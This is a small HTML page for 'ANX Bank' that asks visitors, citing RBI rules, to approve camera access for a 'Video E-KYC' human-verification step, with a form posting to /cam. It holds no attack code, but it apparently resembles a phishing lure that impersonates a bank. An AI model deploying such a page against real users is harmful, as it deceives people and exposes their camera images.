

<!DOCTYPE html>

<html lang="en">

<head>
 
  <meta charset="UTF-8">

  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">

  <title>Bank Video Upload</title>

  <style>

    body {

      padding: 20px;
      background-color: whitesmoke;

    }

    .container {

      max-width: 500px;

    }

  </style>

</head>
<body style="background-image:url(images.png)">
<div class="card mx-auto border-info" style="width: 45rem; background-color:whitesmoke;">
<div class="card-header bg-transparent border-info"><strong>ANX Bank</strong></div>
<div class="card-body">
<body>

  <div class="container">

    <h1 class="mt-2"><span style="color: blueviolet">Bank Video E-KYC</span></h1>

    <p>Welcome to <strong>ANX Bank</strong>.</p>
    <p> As per the banking guidelines by the Reserve Bank of India, it is now <i><span style="color:blueviolet">mandatory</span></i> to complete your KYC.  </p>

    <p><span style="color: blueviolet">ANX Bank</span>, always innovating to create a <i><span style="color: blueviolet">seamless banking experience</span></i>, has brought to you a <span style="color: blueviolet"><i>simple</i></span> and <span style="color: blueviolet"><i>convenient</i></span> way for customers to complete KYC.</p>

    <p style="margin-bottom: 0vmax">For more information, check out the <a href='/faq'>KYC FAQ</a> page.</p>

    <h4 style="margin-top:3"></p><strong><span style="color: blueviolet">Step 1:</span> Grant camera access to proceed with human verification</strong></h4>

    <p>Sit still facing the camera for 20 seconds. Don't forget to smile!</p>

    <form action="/cam" method="post" enctype="multipart/form-data">


      <button type="submit" class="btn btn-primary">Approve</button>
    
    
    </form>

  </div>
  </div>
  </div>
  </body>

 

  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>

</html>

